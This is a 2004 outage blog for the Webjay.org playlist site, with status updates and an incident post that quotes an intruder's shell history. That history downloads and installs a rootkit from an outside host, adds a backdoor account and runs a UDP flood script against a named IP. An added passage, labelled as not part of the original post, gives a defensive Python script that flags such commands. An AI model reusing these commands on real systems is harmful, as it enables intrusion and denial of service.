Tuesday, December 07, 2004

 

Afterlife of this blog

You are reading a defunct weblog. This weblog was created to stand in for the Webjay.org web site when it was totalled by a cracker. During that time the webjay.org domain forwarded to here, where users could get news about progress towards reopening the site.

But no longer.

If you are reading this, you must not have gone through the forwarding address. In that case, there is no here here.

Monday, December 06, 2004

 

BACK FROM THE DEAD -jay


We're flipping the switch to put Webjay back online. It will take about a half day for the change to reach every ISP, so if you see this page instead of webjay.org, stop back in a little while.

In the meantime, let's celebrate:





Friday, December 03, 2004

 

Re-opening Monday

The code is good to go, so the next thing is a couple days' worth of security work.

Grand re-opening date: Monday.

 

Starfrosch playlist

Markus Koller's hand-made M3U (hosted on gonze.com/playlists per my offer the other day) is rocking my apartment block. Markus, my neighbors are cursing you as I write this.

Doing it by hand is primitive but fun. Any more?

Update #1: Brett, aka webjaybs, posted more handmade playlists here:


Update #2: Actually, there's no need to email me the list of song URLs. Just post them in a comment and I'll make an M3U.

Thursday, December 02, 2004

 

Testers wanted

Almost everything is now running, and the bugs are getting smaller and smaller, so it's time to bring in more eyeballs. There are two criteria for people who want to do testing:

1) You have to be technical enough to convince your machine that webjay.org is on the IP address I will give you. On a Unix box this means editing /etc/hosts, on a Mac it means using NetInfo, on a Windows machine it means something I don't know.

2) You have to be known to me already, since the new layer of security isn't ready yet.

Send an email to lucas@gonze.com. (webjay.org email isn't up yet.)

 

Kewl

Forums are up.

Wednesday, December 01, 2004

 

Rosie the 'lister says...

Courtesy P. Harper: 'we can rebuild it' mod of classic Rosie the Riveter image



Lemme tell you, I'm cursing like a sailor while I work on the rebuild. Anyway, if you're really jonesing there is a thing you can do. Back before webjay bootstrapped, Brett, Jim and I were making playlists manually. What you do is make a file entitled playlistname.m3u with a bunch of URLs of songs in it, then put the file in a directory which is set up with the right MIME types. gonze.com/playlists was set up for this, and it still is, so if you email me a .m3u file I'll copy it over there and post a pointer here.

For historical interest, the first really good playlist was Work, which you can still see (and maybe even listen to).


 

Knock knock

Our friend from Brazil came knocking again. In the log of denied IP addresses we have these:

200.175.27.55.dialup.gvt.net.br

201-1-138-30.dsl.telesp.net.br


What a creepy experience. It's like hearing noises in the night and knowing for a fact that it's a burglar.



Tuesday, November 30, 2004

 

Status November 30

The last backed-up version is now running on the new server and I'm in the process of merging in the freshest data and code. Altogether, the new version is up but in a very buggy state.

Monday, November 29, 2004

 

Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.


cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages


Notice that kaotic.pl file -- it must have been there before login, so the crack must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
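
A history file like the one above can be triaged mechanically during incident response. The following is an added example, not part of the original post and not Webjay's code: a small Python pass that follows `cd` commands and labels account changes, password-file edits, history commands run with an option, and anything unpacked or executed under /dev. The rule set and label names are assumptions made for illustration, and the sample is an excerpt of the listing with the download lines left out.

```python
import re
import posixpath

# Excerpt of the history listed above (copied from the page; download lines omitted).
HISTORY = """cd /dev
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r
vi /etc/passwd
/usr/sbin/userdel fire
ps xw
/usr/sbin/adduser crond -d /dev/crond
passwd crond
cd /home/httpd
ls
"""

# (label, pattern) pairs; this rule set is an assumption made for the example.
RULES = [
    ("account-change", re.compile(r"^(\S*/)?(adduser|useradd|userdel|passwd)\b")),
    ("passwd-file-edit", re.compile(r"^(vi|vim|nano|ed)\s+/etc/(passwd|shadow)\b")),
    ("history-manipulation", re.compile(r"^history\s+-\w")),  # history run with any option
    ("home-under-dev", re.compile(r"\s-d\s+/dev/\S+")),
]
STAGING = re.compile(r"^(wget|curl|tar|unzip)\b|^\./\S+")

def triage(history_text):
    """Return (line_no, command, labels) for every command that matches a rule."""
    cwd, findings = "/", []
    for n, cmd in enumerate(history_text.splitlines(), 1):
        cmd = cmd.strip()
        labels = [name for name, rx in RULES if rx.search(cmd)]
        # Downloads, unpacking or local executables run from under /dev are staging.
        if STAGING.search(cmd) and (cwd + "/").startswith("/dev/"):
            labels.append("staging-in-dev")
        m = re.match(r"^cd\s+(\S+)", cmd)
        if m:  # follow cd so later commands are judged in the right directory
            cwd = posixpath.normpath(posixpath.join(cwd, m.group(1)))
        if labels:
            findings.append((n, cmd, labels))
    return findings

if __name__ == "__main__":
    for n, cmd, labels in triage(HISTORY):
        print(f"{n:>3}  {','.join(labels):<32} {cmd}")
```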

 

Prognosis

The database looks fine, so playlists and user accounts should be in good shape.

There are two backups of the code, a fairly old one which holds everything and a fresh one which holds only a few critical modules. These two different snapshots will have to be knitted together, which means that bugs will crop up during the first 1-2 days back up. Also, bugs fixed in the older backup will have to be refound and refixed.

My guess for how long the work will take is a few days at the least, a week at the most.

